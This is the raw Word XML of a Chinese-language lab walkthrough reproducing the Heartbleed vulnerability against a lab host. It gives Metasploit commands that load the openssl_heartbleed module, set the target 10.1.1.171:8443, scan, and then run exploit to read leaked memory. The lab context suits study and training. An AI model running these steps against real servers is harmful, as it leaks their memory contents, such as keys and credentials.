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01" w:rsidRPr="00A44C7F" w:rsidRDefault="00A44C7F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44C7F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>一、靶场搭建</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A44C7F" w:rsidRDefault="00A44C7F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A44C7F" w:rsidRDefault="000C21B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BF" w:rsidRDefault="000C21BF">
                            <w:r w:rsidRPr="000C21BF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0C21BF" w:rsidRDefault="000C21BF">
                      <w:r w:rsidRPr="000C21BF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4C7F" w:rsidRDefault="00A44C7F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2、访问8</w:t>
      </w:r>
      <w:r>
        <w:t>443</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口，可看到h</w:t>
      </w:r>
      <w:r>
        <w:t>ello</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A44C7F" w:rsidRDefault="000C21BF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A4554C3" wp14:editId="408365EE">
            <wp:extent cx="253365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7F" w:rsidRDefault="00A44C7F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A44C7F" w:rsidRPr="00A44C7F" w:rsidRDefault="00A44C7F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44C7F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>二、漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A44C7F" w:rsidRDefault="000C21BF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1、启动</w:t>
      </w:r>
      <w:r>
        <w:t>msf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，命令如下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C21BF" w:rsidRDefault="000C21BF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BF" w:rsidRDefault="000C21BF">
                            <w:r>
                              <w:t>msfconsole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5aGyp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0C21BF" w:rsidRDefault="000C21BF">
                      <w:r>
                        <w:t>msfconsole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21BF" w:rsidRDefault="000C21BF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2、开启心脏滴血漏洞检测，显示存在漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C21BF" w:rsidRDefault="000C21BF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5246077" cy="1404620"/>
                <wp:effectExtent l="0" t="0" r="12065" b="2159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0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BF" w:rsidRDefault="000C21BF">
                            <w:r w:rsidRPr="000C21BF">
                              <w:t>use auxiliary/scanner/ssl/openssl_heartbleed</w:t>
                            </w:r>
                            <w:r w:rsidRPr="000C21BF">
                              <w:br/>
                              <w:t>set RHOSTS 10.1.1.171</w:t>
                            </w:r>
                            <w:r w:rsidRPr="000C21BF">
                              <w:br/>
                              <w:t>set RPORT 8443</w:t>
                            </w:r>
                            <w:r w:rsidRPr="000C21BF">
                              <w:br/>
                              <w:t>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3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">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w:rsidR="000C21BF" w:rsidRDefault="000C21BF">
                      <w:r w:rsidRPr="000C21BF">
                        <w:t>use auxiliary/scanner/ssl/openssl_heartbleed</w:t>
                      </w:r>
                      <w:r w:rsidRPr="000C21BF">
                        <w:br/>
                        <w:t>set RHOSTS 10.1.1.171</w:t>
                      </w:r>
                      <w:r w:rsidRPr="000C21BF">
                        <w:br/>
                        <w:t>set RPORT 8443</w:t>
                      </w:r>
                      <w:r w:rsidRPr="000C21BF">
                        <w:br/>
                        <w:t>run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21BF" w:rsidRDefault="000C21BF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30CCB299" wp14:editId="5432654F">
            <wp:extent cx="5274310" cy="1487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BF" w:rsidRDefault="000C21BF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3、开启攻击，成功读取数据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C21BF" w:rsidRDefault="000C21BF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BF" w:rsidRDefault="000C21BF">
                            <w:r w:rsidRPr="000C21BF">
                              <w:t>set verbose true</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="000C21BF" w:rsidRDefault="000C21BF">
                            <w:r w:rsidRPr="000C21BF">
                              <w:t>exploit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6tNgIAAE0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BISv6t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0C21BF" w:rsidRDefault="000C21BF">
                      <w:r w:rsidRPr="000C21BF">
                        <w:t>set verbose true</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="000C21BF" w:rsidRDefault="000C21BF">
                      <w:r w:rsidRPr="000C21BF">
                        <w:t>exploit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21BF" w:rsidRDefault="000C21BF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BCF6D32" wp14:editId="08DF8859">
            <wp:extent cx="5274310" cy="3309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61D" w:rsidRDefault="007E461D" w:rsidP="00A44C7F">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="007E461D" w:rsidRDefault="007E461D" w:rsidP="00A4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61D" w:rsidRDefault="007E461D" w:rsidP="00A44C7F">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="007E461D" w:rsidRDefault="007E461D" w:rsidP="00A44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00"/>
    <w:rsid w:val="000C21BF"/>
    <w:rsid w:val="00594201"/>
    <w:rsid w:val="00665000"/>
    <w:rsid w:val="007E461D"/>
    <w:rsid w:val="00A4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B9324"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{DECC12E5-0AF5-400C-B580-56EA8A90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C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2022-05-28T14:45:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-28T16:07:00Z</dcterms:modified>
</cp:coreProperties>
</file>